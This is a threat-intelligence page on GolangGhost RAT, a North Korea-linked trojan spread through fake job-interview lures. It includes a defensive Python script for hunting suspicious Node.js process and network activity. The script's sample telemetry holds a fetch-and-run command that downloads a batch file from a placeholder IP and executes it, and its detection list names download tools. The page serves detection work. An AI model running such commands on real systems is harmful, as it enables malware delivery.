GolangGhost RAT
GoLangGhost RAT is a Go-based remote access trojan first observed in the wild around February 2025. It is the predecessor of PyLangGhost RAT: by May 2025 the codebase had been ported from Go to Python. The family is associated with the North Korean government-linked threat group NICKEL ALLEY and with the Contagious Interview campaign, in which operators used fake job opportunities, fraudulent company personas, fake LinkedIn pages, GitHub repositories and other developer-focused lures to target technology and Web3 professionals. The sources behind this page establish only that GoLangGhost preceded PyLangGhost; they do not describe a distinct GoLangGhost-specific infection chain or any technical differences beyond the Go implementation. The successor, PyLangGhost RAT, supports arbitrary command execution, file exfiltration, system profiling, browser credential theft, cookie theft, and theft of data from Chrome cryptocurrency wallet extensions, but the sources do not confirm that every one of these capabilities was present in the earlier Go variant. No GoLangGhost-specific indicators of compromise are provided.
Groups observed using it
2 distinct threat actors attributed by public researchers.
PyLangGhost RAT was preceded by a GoLang-based version known as GoLangGhost RAT. Samples of GoLangGhost RAT were first observed in the wild around February 2025.
References
FlexibleFerret: macOS Malware Deploys in Fake Job Scams [[URL_079a8396_137]]
Famous Chollima deploying Python version of GolangGhost RAT [[URL_079a8396_138]]
Techniques & procedures
3 distinct techniques documented for this family, organized by ATT&CK tactic.
Execution
2 techniques
This involved the attacker-controlled web interface presenting an error informing the victim that they must run a command locally to fix the issue – a command that instead initiated a series of actions leading to PyLangGhost RAT.
Command and Control
1 technique
Organizations should monitor command execution and network traffic that spawns from Node.js processes, as it may indicate malware retrieval.
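The monitoring recommendation above can be turned into two hunt rules: flag shells, interpreters and download utilities spawned by a Node.js process, and flag outbound connections from a Node.js process to destinations that are neither internal nor part of a known toolchain allowlist. The following is an added example written for this page, not code from Cisco Talos, Mallory or the malware authors. The event layout (flat dictionaries with Sysmon-style field names), the process-name and allowlist sets, and the sample telemetry are all assumptions constructed for illustration; the IPs are documentation (TEST-NET) placeholders, not observed indicators.

```python
"""Hunt rules for command execution and network traffic originating from
Node.js processes (added example; field names and lists are assumptions)."""
import ipaddress
from dataclasses import dataclass

# Process image names treated as Node.js (assumption: adjust to your fleet).
NODE_IMAGES = {"node", "node.exe", "nodejs"}

# Children of node worth a look: shells, interpreters and download utilities.
# Legitimate build scripts spawn these too, so hits are leads to triage.
SUSPICIOUS_CHILDREN = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "sh", "bash", "zsh",
    "curl", "curl.exe", "wget", "certutil.exe", "bitsadmin.exe",
    "python", "python3", "python.exe", "osascript",
}

# Destinations a Node toolchain normally talks to (assumed allowlist).
ALLOWED_DEST_HOSTS = {"registry.npmjs.org", "registry.yarnpkg.com"}

# RFC 1918 and loopback ranges, listed explicitly: ipaddress's is_global also
# returns False for the TEST-NET documentation ranges used in the sample below,
# which would silently hide the placeholder "external" connection.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]


@dataclass(frozen=True)
class Finding:
    rule: str
    host: str
    detail: str


def basename(path: str) -> str:
    """Last path component, lower-cased, for either slash convention."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def is_internal(ip_text: str) -> bool:
    """True for loopback and RFC 1918 addresses; False for anything unparsable."""
    try:
        ip = ipaddress.ip_address(ip_text)
    except ValueError:
        return False
    return any(ip in net for net in INTERNAL_NETS)


def check_process_create(event: dict):
    """Rule 1: a Node.js process spawned a shell, interpreter or downloader."""
    if event.get("event_type") != "process_create":
        return None
    if basename(event.get("parent_image", "")) not in NODE_IMAGES:
        return None
    if basename(event.get("image", "")) not in SUSPICIOUS_CHILDREN:
        return None
    return Finding("node_spawned_command", event["host"],
                   f"{event['parent_image']} -> {event['command_line']}")


def check_network_connect(event: dict):
    """Rule 2: a Node.js process connected to a non-internal, non-allowlisted host."""
    if event.get("event_type") != "network_connect":
        return None
    if basename(event.get("image", "")) not in NODE_IMAGES:
        return None
    if event.get("dest_host", "").lower() in ALLOWED_DEST_HOSTS:
        return None
    if is_internal(event.get("dest_ip", "")):
        return None
    return Finding("node_external_connection", event["host"],
                   f"{event['image']} -> {event['dest_ip']}:{event['dest_port']}")


def hunt(events):
    """Run both rules over an iterable of events and return findings in order."""
    findings = []
    for ev in events:
        for rule in (check_process_create, check_network_connect):
            hit = rule(ev)
            if hit:
                findings.append(hit)
    return findings


# Constructed sample telemetry: paths, command lines and IPs are placeholders.
SAMPLE_EVENTS = [
    {"event_type": "process_create", "host": "dev-laptop-01",
     "parent_image": r"C:\Program Files\nodejs\node.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"cmd.exe /c curl -sL http://203.0.113.10/setup -o %TEMP%\setup.bat && %TEMP%\setup.bat"},
    {"event_type": "process_create", "host": "dev-laptop-01",
     "parent_image": r"C:\Program Files\nodejs\node.exe",
     "image": r"C:\Program Files\Git\cmd\git.exe",
     "command_line": "git rev-parse HEAD"},  # ordinary build step, not flagged
    {"event_type": "network_connect", "host": "dev-laptop-01",
     "image": r"C:\Program Files\nodejs\node.exe",
     "dest_ip": "203.0.113.10", "dest_host": "", "dest_port": 80},
    {"event_type": "network_connect", "host": "dev-laptop-01",
     "image": r"C:\Program Files\nodejs\node.exe",
     "dest_ip": "198.51.100.7", "dest_host": "registry.npmjs.org", "dest_port": 443},  # allowlisted
    {"event_type": "process_create", "host": "dev-laptop-01",
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe"},  # shell, but not a child of node
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.host}: {f.detail}")
```

Run against the sample, only the node-spawned cmd.exe and the node connection to the unlisted external address are reported; the git child, the allowlisted registry connection and the explorer-spawned shell are ignored. In a real deployment, populate the allowlist from observed baseline traffic and expect build tooling to produce some benign rule 1 hits that need triage.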
Recent activity
2 sources tracked across advisories, community write-ups, and news.
A Go-based predecessor to PyLangGhost RAT, apparently ported later into Python as PyLangGhost.